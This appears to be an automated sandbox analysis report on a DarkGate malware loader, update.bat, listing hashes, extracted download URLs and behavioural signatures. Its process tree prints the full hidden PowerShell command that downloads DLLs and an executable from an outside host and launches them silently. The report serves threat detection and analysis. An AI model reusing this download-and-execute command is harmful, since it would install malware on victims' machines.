Overview
overview
10Static
static
10exe/crypte...te.bat
windows10-1703-x64
10exe/crypte...er.vbs
windows10-1703-x64
10exe/crypte...-0.dll
windows10-1703-x64
1exe/crypte...e3.exe
windows10-1703-x64
3exe/crypte...-0.dll
windows10-1703-x64
3exe/crypte...in.exe
windows10-1703-x64
10exe/crypte...e3.dll
windows10-1703-x64
1libssp-0.dll
windows10-1703-x64
3pidgin.exe
windows10-1703-x64
10sqlite3.dll
windows10-1703-x64
1exe/non cr...x.html
windows10-1703-x64
4exe/non cr...ed.exe
windows10-1703-x64
10exe/non cr...x.html
windows10-1703-x64
4Resubmissions
25-08-2024 09:52
240825-lwb7jsxgmh 1022-08-2024 07:27
240822-h98wwsvdrh 1022-08-2024 07:21
240822-h651tsxhrk 1021-08-2024 20:21
240821-y44b8aydje 10Analysis
-
max time kernel
16s -
max time network
18s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
21-08-2024 20:21
Behavioral task
behavioral1
Sample
exe/crypted/Dakrgate 5864 startup plus rootkit/Batch file for 5864v dll crypted darkgate/update.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
exe/crypted/Dakrgate 5864 startup plus rootkit/Crypted_with AU3 with startup only with decoded Launcher VBS/launcher.vbs
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
exe/crypted/Dakrgate 5864 startup plus rootkit/Crypted_with AU3 with startup only with decoded Launcher VBS/libssp-0.dll
Resource
win10-20240404-en
Behavioral task
behavioral4
Sample
exe/crypted/Dakrgate 5864 startup plus rootkit/Crypted_with AU3 with startup only with decoded Launcher VBS/sqlite3.exe
Resource
win10-20240404-en
Behavioral task
behavioral5
Sample
exe/crypted/Dakrgate 5864 startup plus rootkit/protected_AU3_cGig/libssp-0.dll
Resource
win10-20240404-en
Behavioral task
behavioral6
Sample
exe/crypted/Dakrgate 5864 startup plus rootkit/protected_AU3_cGig/pidgin.exe
Resource
win10-20240404-en
Behavioral task
behavioral7
Sample
exe/crypted/Dakrgate 5864 startup plus rootkit/protected_AU3_cGig/sqlite3.dll
Resource
win10-20240404-en
Behavioral task
behavioral8
Sample
libssp-0.dll
Resource
win10-20240404-en
Behavioral task
behavioral9
Sample
pidgin.exe
Resource
win10-20240404-en
Behavioral task
behavioral10
Sample
sqlite3.dll
Resource
win10-20240611-en
Behavioral task
behavioral11
Sample
exe/non crypted/Darkgate 5864 port sample not startup/index.html
Resource
win10-20240404-en
Behavioral task
behavioral12
Sample
exe/non crypted/Darkgate 5864 port sample not startup/stubbed.exe
Resource
win10-20240404-en
Behavioral task
behavioral13
Sample
exe/non crypted/index.html
Resource
win10-20240404-en
General
-
Target
exe/crypted/Dakrgate 5864 startup plus rootkit/Batch file for 5864v dll crypted darkgate/update.bat
-
Size
6KB
-
MD5
97b7c88a02b2a5214d742b7ed50f4544
-
SHA1
15bf7dd44049b94db1a82504802ead45f6186fa0
-
SHA256
20c3a5b1c87627e9e016494b806273230f5023cf12d2c0e29eceecb7b8a6d3b6
-
SHA512
918c856e61d8b348a705227ec381a8101481ec3aaa4a1f6545b9706ebf491d311cfe716f62ab04c796333bae5df857fc67cac86760be1c67578ca1031a906b25
-
SSDEEP
192:GqNFRmxkyzz06ETWtd4pTunJ8ccJkBhKhgQ:Vp2kgzSTWsu6hJEhKht
Malware Config
Extracted
https://tt.vg/download-update-dll1
https://tt.vg/dlldownload2sqliuit-download
https://tt.vg/download-latest-update
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 2 3644 powershell.exe 6 3644 powershell.exe 8 3644 powershell.exe 9 3644 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 3644 powershell.exe 1604 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 3644 powershell.exe 3644 powershell.exe 3644 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3644 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exedescription pid process target process PID 2812 wrote to memory of 3644 2812 cmd.exe powershell.exe PID 2812 wrote to memory of 3644 2812 cmd.exe powershell.exe PID 2812 wrote to memory of 1604 2812 cmd.exe powershell.exe PID 2812 wrote to memory of 1604 2812 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\exe\crypted\Dakrgate 5864 startup plus rootkit\Batch file for 5864v dll crypted darkgate\update.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -Command "& {$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://tt.vg/download-update-dll1', 'C:\Users\Admin\AppData\Local\Temp\libssp-0.dll'); $wc.DownloadFile('https://tt.vg/dlldownload2sqliuit-download', 'C:\Users\Admin\AppData\Local\Temp\sqlite3.dll'); $wc.DownloadFile('https://tt.vg/download-latest-update', 'C:\Users\Admin\AppData\Local\Temp\pidgin.exe')}"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3644 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -Command "& {Start-Process 'C:\Users\Admin\AppData\Local\Temp\pidgin.exe' -WindowStyle Hidden}"2⤵
- Command and Scripting Interpreter: PowerShell
PID:1604
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a